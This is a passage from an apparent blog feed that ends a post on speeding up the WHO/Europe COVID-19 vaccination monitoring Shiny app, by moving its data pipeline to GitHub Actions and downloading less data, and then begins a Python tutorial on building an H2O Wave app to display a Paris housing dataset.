raw data had updated. Then when the next user opens the app, the
data-processing and uploading steps would run. Though that user would
have a poor experience, most users wouldn’t.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/graphics/d2_structure_before.svg" title="For some users, data-processing will occur before the app loads" alt="For some users, data-processing will occur before the app loads" width="300px" height="350px" /&gt;
&lt;p&gt;This was the structure of the WHO/Europe COVID-19 vaccination programme
monitoring application before we started working with it. Raw and
processed data were stored on an Azure server and the app ensured that
the processed data was kept in-sync with any updates to the raw data.
The whole data pipeline was only run a few times a week, because the raw
datasets were updated on a weekly basis. The load time for a typical
user was approximately 1 minute, whereas the first user after the raw
data had been updated may have to wait 3 or 4 minutes for the app to
load.&lt;/p&gt;
&lt;!---
In truth, it was probably pretty rare for a real user to wait that long, because the WHO
would run the app as soon as they had uploaded the new data to check that it had populated
content properly. But us poor developers had to wait a long time to check if our solutions
had really worked when fixing bugs in the app.
--&gt;
&lt;h2 id="transfer-as-little-data-as-possible"&gt;Transfer as little data as possible&lt;/h2&gt;
&lt;p&gt;Data is slow. So if you need lots of it, keep it close to you, and make
sure you only access the bits that you need.&lt;/p&gt;
&lt;!--- Where should data be stored if it doesn't need updating --&gt;
&lt;p&gt;There is a hierarchy of data speeds. For an app running on a server,
data-access is fastest when stored in memory, slower when stored on the
hard-drive, and much, much slower when it is accessed via the internet.
So, where possible, you should aim to store the data that is used within
an app on the server(s) from which the app is deployed.&lt;/p&gt;
&lt;p&gt;With Shiny apps, it is possible to bundle datasets alongside the source
code, such that wherever the app is deployed, those datasets are
available. A drawback of coupling the source code and data in this way,
is that the data would need to be kept in version control along with
your source code, and a new deployment of the app would be required
whenever the data is updated. So for datasets that are frequently
updated (as for the vaccination counts that underpin the WHO/Europe
app), this is impractical. But storing datasets alongside the source
code (or in a separate R package that is installed on the server) may be
valuable if those datasets are unlikely to change during the lifetime of
a project.&lt;/p&gt;
&lt;!--- Where should data be stored if it does need updating --&gt;
&lt;p&gt;For datasets that are large, or are frequently updated, cloud storage
may be the best solution. This allows collaborators to upload new data
on an ad-hoc basis without touching the app itself. The app would then
download data from the cloud for presentation during each user session.&lt;/p&gt;
&lt;!--- Partition the datasets --&gt;
&lt;p&gt;That solution might sound mildly inefficient. For each user that opens
the app, the same datasets are downloaded—likely, onto the same server.
How can we make this process more efficient? There are some rather
technical tips that might help—like using &lt;a href="https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/"&gt;efficient file
formats&lt;/a&gt; to store large datasets,
&lt;a href="https://shiny.rstudio.com/articles/caching.html" rel="external"&gt;cacheing&lt;/a&gt; the data for
the app’s landing page, or using &lt;a href="https://rstudio.github.io/promises/articles/shiny.html" rel="external"&gt;asynchronous
computing&lt;/a&gt; to
initiate downloading the data while presenting a less data-intensive
landing page.&lt;/p&gt;
&lt;p&gt;A somewhat less technical solution is to identify precisely which
datasets are needed by the app and only download them.&lt;/p&gt;
&lt;p&gt;Imagine the raw datasets could be partitioned into:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;those that are only required when constructing a (possibly smaller)
processed dataset that is presented by the app; and&lt;/li&gt;
&lt;li&gt;those that are actually presented by the app.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If this can be done, there won’t be any difference when the app runs the
whole data processing pipeline, both sets of raw data would still be
downloaded, and the processed data would be uploaded to the cloud. But
for most users the app would only download the processed datasets and
the second set of raw datasets.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/graphics/d3_side_by_side.svg" title="Only one set of data is downloaded by most users" alt="Only one set of data is downloaded by most users" width="300px" height="350px" /&gt;
&lt;p&gt;In the COVID-19 vaccination programme monitoring app, evolving to this
state meant that two large files (~ 50MB in total) were no longer
downloaded per user session.&lt;/p&gt;
&lt;!---
Raw data:
- 29M (TESSy_eu.csv)
- 22M (eJRF *_covuptake.csv)
--&gt;
&lt;h2 id="do-as-little-processing-as-possible--in-the-app"&gt;Do as little processing as possible … in the app&lt;/h2&gt;
&lt;p&gt;In the above, we showed some steps that should reduce the amount of
processing and data transfer for a typical user of the app. With those
changes, the data processing pipeline was still inside the app. This is
undesirable. For some users, the whole data processing pipeline will run
during their session, which makes for a poor user experience. But it
also means that some user sessions require considerably greater memory
and data transfer requirements than others. If the data pipeline could
run outside of the app, these issues would be eased.&lt;/p&gt;
&lt;p&gt;If we move the data pipeline outside of the app, where should we move
it? It is possible to run processing scripts in a few places. For this
project, we chose to run the data processing pipeline on GitHub on a
daily schedule, as part of a GitHub Actions workflow. This was simply
because the source code is hosted there. GitLab, Bitbucket, Azure and
many other providers can run scripts in a similar way.&lt;/p&gt;
&lt;p&gt;So now, the data used within the app is processed on GitHub and uploaded
to Azure before it is needed by the app.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/graphics/d4_github_processing.svg" title="For some users, data-processing will occur before the app loads" alt="For some users, data-processing will occur before the app loads" height="500px" /&gt;
&lt;p&gt;The combination of these changes meant that the WHO/Europe COVID-19
vaccination programme monitoring app, which previously took ~ 1min (and
occasionally ~ 4min) to load, now takes a matter of seconds.&lt;/p&gt;
&lt;h2 id="what-complexities-might-this-introduce"&gt;What complexities might this introduce&lt;/h2&gt;
&lt;p&gt;In the simplest app presented here, all data processing was performed
whenever a new user session was started. The changes described have made
the app easier to use (from the user’s perspective) but mean that for
the developers, coordination between the different components must be
managed.&lt;/p&gt;
&lt;p&gt;For example, if the data team upload some new raw data, there should be
a mechanism to ensure that that data gets processed and into the app in
a timely manner. If the source code for the app or the data processing
pipeline change, the data processing pipeline should run afresh. If
changes to the structure of the raw dataset mean that the data
processing pipeline produces malformed processed data, there should be a
way to log that.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Working with the WHO/Europe COVID-19 vaccination programme monitoring
app has posed several challenges. The data upon which it is based is
constantly updated and has been restructured several times, consistent
with the challenges that the international community has faced. Here
we’ve outlined some steps that we followed to ensure that the data
underpinning this COVID-19 vaccination programme monitoring app is
presented to the community in an up-to-date and easy to access way. To
do this, we streamlined the app—making it do as little as possible when
a user is viewing it—by downloading only what it needs, and by removing
any extensive data processing.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Making a web application to display data with H2O Wave</title><link>https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/</link><pubDate>Thu, 16 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/final_app.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re used to coding in Python or R and want to write a web application quickly you can avoid having to learn HTML, JavaScript, etc, by using H2O Wave to write your web application with Python or R. In this post we will go through an example of how to build a simple app to display data in various forms including plots, tables and graphics using Python.&lt;/p&gt;
&lt;p&gt;Before continuing with this tutorial if you have no experience with H2O Wave I would strongly suggest going through their &lt;a href="https://wave.h2o.ai/docs/getting-started" rel="external"&gt;introductory tutorials and installation guide&lt;/a&gt; first before you proceed. The introductory tutorials will talk you through how to set up basic apps, starting with the classic &amp;lsquo;Hello World&amp;rsquo; example that we all know and love and also show you how to install H2O Wave.&lt;/p&gt;
&lt;p&gt;To start, I would suggest creating a Python script called &lt;code&gt;app.py&lt;/code&gt;, this is where we will write all of our code. To see how the app develops throughout this tutorial, from the terminal we can run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wave run app.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If this does not work, make sure you have &lt;code&gt;h2o_wave&lt;/code&gt; installed in the python environment that you are using.&lt;/p&gt;
&lt;h2 id="the-dataset"&gt;The dataset&lt;/h2&gt;
&lt;p&gt;For this tutorial we will be using an imaginary housing dataset which you can download from &lt;a href="https://www.kaggle.com/datasets/mssmartypants/paris-housing-price-prediction" rel="external"&gt;Kaggle&lt;/a&gt;. It gives a variety of information on housing stock (e.g. number of rooms, square footage, etc&amp;hellip;) and their pricing. We will make a simple app to display some of these data.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-displaying-data-with-h2o-wave"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-basic-setup"&gt;The basic setup&lt;/h2&gt;
&lt;p&gt;Whenever I start writing a Wave app I always start with the basic setup which we will use for our web application.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;h2o_wave&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Q, ui, app, main
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/displayData&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;server&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_homepage&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first thing we do is import &lt;code&gt;h2o_wave&lt;/code&gt; and define where to listen to the user interface with &lt;code&gt;@app()&lt;/code&gt; (in our code that will be &lt;code&gt;localhost:10101/displayData&lt;/code&gt;). If we now save &lt;code&gt;app.py&lt;/code&gt; and visit &lt;code&gt;localhost:10101/displayData&lt;/code&gt; in a browser we should see a blank web page. If you keep this browser open, every time we save &lt;code&gt;app.py&lt;/code&gt; the browser will update to show the latest additions to our web application.&lt;/p&gt;
&lt;p&gt;We then define a function &lt;code&gt;server()&lt;/code&gt; which will be run every time a user interfaces with &lt;code&gt;localhost:10101/displayData&lt;/code&gt;. Inside &lt;code&gt;server&lt;/code&gt; I always call two functions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;apply_layout()&lt;/code&gt; where we define the layout of the app.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;show_homepage()&lt;/code&gt; which will be the default loading page for the app.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We&amp;rsquo;ll start by creating a basic homepage layout that will only include a header and a footer for now, but we will add to this function as we go. We will then add pages to &lt;code&gt;show_homepage()&lt;/code&gt; to display the header and footer.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q:Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;meta&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;meta_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; theme&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;nord&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; layouts&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breakpoint&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;xl&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;1600px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_homepage&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;header_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;100%&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;86px&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Money&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon_color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Black&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Paris Housing Market&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;This is an imaginary housing dataset&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;footer_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; caption&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;This dataset was obtained from [Kaggle](https://www.kaggle.com/datasets/mssmartypants/paris-housing-price-prediction)&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In &lt;code&gt;apply_layout()&lt;/code&gt; we add a page, &lt;code&gt;meta&lt;/code&gt;, to create a &lt;code&gt;meta_card&lt;/code&gt; object. We specify a theme for our app using the &lt;code&gt;theme&lt;/code&gt; argument and also define a web app layout using the &lt;code&gt;layout&lt;/code&gt; argument. The most important part of &lt;code&gt;apply_layout()&lt;/code&gt; is contained within &lt;code&gt;ui.layout&lt;/code&gt; for our &lt;code&gt;layout&lt;/code&gt; argument. This is where we specify different zones by using &lt;code&gt;ui.zone()&lt;/code&gt;. We define a &lt;code&gt;header&lt;/code&gt; zone for the header and a &lt;code&gt;footer&lt;/code&gt; zone for the footer. Note that a zone can be made up of multiple zones which we&amp;rsquo;ll see later on.&lt;/p&gt;
&lt;p&gt;In &lt;code&gt;show_homepage()&lt;/code&gt; we add two cards:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;header&lt;/code&gt;. This uses the &lt;code&gt;ui.header_card&lt;/code&gt; to define the header for our app. The &lt;code&gt;icon&lt;/code&gt; argument references &lt;a href="https://uifabricicons.azurewebsites.net/" rel="external"&gt;UI Fabric icons&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;footer&lt;/code&gt;. This uses the &lt;code&gt;ui.footer_card&lt;/code&gt; to define the footer for our app. The &lt;code&gt;caption&lt;/code&gt; argument takes string input but recognises markdown, so you can easily add links like we have here.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Both cards have the argument &lt;code&gt;box&lt;/code&gt;. We use &lt;code&gt;box&lt;/code&gt; here to link the cards with our layout in &lt;code&gt;apply_layout()&lt;/code&gt;. For example, we have a footer zone in our layout function labelled &lt;code&gt;footer&lt;/code&gt;. Setting &lt;code&gt;box = 'footer'&lt;/code&gt; inside &lt;code&gt;ui.footer_carder&lt;/code&gt; informs the code to place the footer card where we have specified it to be inside &lt;code&gt;apply_layout()&lt;/code&gt;. If we want to be more specific with the box location we can the function &lt;code&gt;ui.box&lt;/code&gt; for the &lt;code&gt;box&lt;/code&gt; argument, this is what we do inside &lt;code&gt;ui.header_card&lt;/code&gt;. Here we have specified the width of the box using the &lt;code&gt;width&lt;/code&gt; argument, and the height using the &lt;code&gt;height&lt;/code&gt; argument. Pass &lt;code&gt;width = 100%&lt;/code&gt; will make the box the width of the app.&lt;/p&gt;
&lt;p&gt;If you save &lt;code&gt;app.py&lt;/code&gt; you should see the web app update in your browser to have a header and footer, like in the image below.&lt;/p&gt;
&lt;p&gt;&lt;img alt="The header and footer of the Wave app displayed in the browser" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/adding_header_and_footer.png" width="1848"&gt;&lt;/p&gt;
&lt;h2 id="adding-a-table"&gt;Adding a table&lt;/h2&gt;
&lt;p&gt;The first thing we&amp;rsquo;ll add to our app is a table to view the raw data. To start we&amp;rsquo;ll need to read in our data with &lt;code&gt;pandas&lt;/code&gt; and then we can create a table with &lt;code&gt;ui.table()&lt;/code&gt;, which we&amp;rsquo;ll put into a function called &lt;code&gt;show_table()&lt;/code&gt;. Note that we will only load the first 100 rows of the table otherwise the app is slow to load.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#39;ParisHousing.csv&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_table&lt;/span&gt;(df):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;table&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;250px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table_column(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;x, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;x) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table_row(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; str(i),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cells &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(map(str, df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;values&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;index[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;:&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_table&lt;/span&gt;(q:Q, df):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Add a title&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;section_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Table of the data&amp;#39;&lt;/span&gt;,
